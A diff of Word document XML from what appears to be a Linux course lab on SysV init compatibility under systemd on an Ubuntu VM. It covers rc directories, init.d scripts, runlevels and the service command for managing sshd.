-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">If you run </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>ls /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:t>or</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ls /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>rc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>*</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -d </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">to see just directories that start with </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>rc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> on your Ubuntu VM, you should be able to find the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>rc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>directories</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> that provide SysV compatibility.  </w:t>
-      </w:r>
-      <w:r>
-        <w:t>The standard run level that</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> provides GUI support</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is 5,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> so let’s look at </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>rc5.d</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> with </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>ls -l /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>/rc</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>5</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>.d</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="655C60ED" wp14:editId="69A7EC1F">
-            <wp:extent cx="4742597" cy="724653"/>
-            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
-            <wp:docPr id="6" name="Picture 6"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId8"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4844396" cy="740208"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>&lt;snip&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The symbolic links</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>symlinks</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> in /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/rc</w:t>
-      </w:r>
-      <w:r>
-        <w:t>5</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.d point to files in the /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>init</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> directories.  Look at the contents of those directories as well.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  If you look at the contents of one of the files in the /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>init.d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>directory</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, you will see it contains a shell script.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  Remember, in SysV the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> program looks at the files in the proper run level directory and then executes the files the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>symlinks</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> point to.  It uses </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>symlinks</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to avoid duplicate copies of a file that is executed by multiple run levels</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E03D7A6" wp14:editId="47832150">
-            <wp:extent cx="4261110" cy="2348837"/>
-            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
-            <wp:docPr id="5" name="Picture 5"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4290149" cy="2364844"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>&lt;snip&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Note:  In other distros like CentOS, there is no </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> directory, since </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is the name of the command used to change </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>run level</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">s.  Also, the files are kept in (say for </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>run level</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 5) </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_Hlk17375398"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>rc.d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>/rc5.d</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>.  There is a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>n</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">/rc5.d, but it is just a symlink that points to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>rc.d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>/rc5.d.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">To ease the burden of keeping track of the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>symlinks</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> in the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>rc.d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> directories</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">SysV uses a utility </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">called </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>chkconfig</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, but it is not always part of the default installation.  The systemd utilities do not support the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>chkconfig</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> command, so we won’t be able to use it here.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  In addition to maintaining the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>rc.d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> directories</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>chkconfig</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --list</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> will also list the services on the VM (not supported in Ubuntu on systemd, though).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">The SysV command to show the current </w:t>
-      </w:r>
-      <w:r>
-        <w:t>run level</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>runlevel</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">.  It is supported by systemd, so go ahead and execute it.  It will show you the equivalent RedHat </w:t>
-      </w:r>
-      <w:r>
-        <w:t>run level</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, 5</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> for the GUI level.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">The SysV command to change </w:t>
-      </w:r>
-      <w:r>
-        <w:t>run level</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> or </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>telinit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is supported in systemd</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (note: it works in VMware Player 16.1.2 with Ubuntu </w:t>
-      </w:r>
-      <w:r>
-        <w:t>20.04 but</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> locks up in </w:t>
-      </w:r>
-      <w:r>
-        <w:t>VMware Player 15.1 and Ubuntu 18.04</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  The command to change to the Ubuntu console </w:t>
-      </w:r>
-      <w:r>
-        <w:t>run level</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> would be </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>(emergency)</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> or</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 2</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (console only).  </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve">udo </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>5</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> would take you back to the GUI</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> or the old run level 5</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">If you have the correct versions, try executing </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">.  Your VM will </w:t>
-      </w:r>
-      <w:r>
-        <w:t>drop</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> into a terminal-only mode.  What you will see is terminal with no GUI, like the sysadmins had in days of old.  Notice that there is no </w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>scroll bar, so something that goes off the top of the screen is gone forever.  There is no mouse</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> pointer for cutting and pasting</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.  Omg, how did they manage?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03CA9A80" wp14:editId="498E14FC">
-            <wp:extent cx="4747565" cy="1357317"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="3" name="Picture 3"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1486,7 +426,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4789643" cy="1369347"/>
+                      <a:ext cx="5330637" cy="1956817"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1498,40 +438,172 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">If the VM captures your mouse and will not release it, hit </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>cntl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>-alt</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> to get it back.  Here’s what the console looks like.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:t>&lt;snip&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>You will see later that the output is the same as what you get with the systemd commands.  The SysV commands have been intercepted and passed to systemd.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Practice using the SysV </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>service</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> command </w:t>
+      </w:r>
+      <w:r>
+        <w:t>to stop, start, and restart the sshd service.  Each time you change the service, use</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
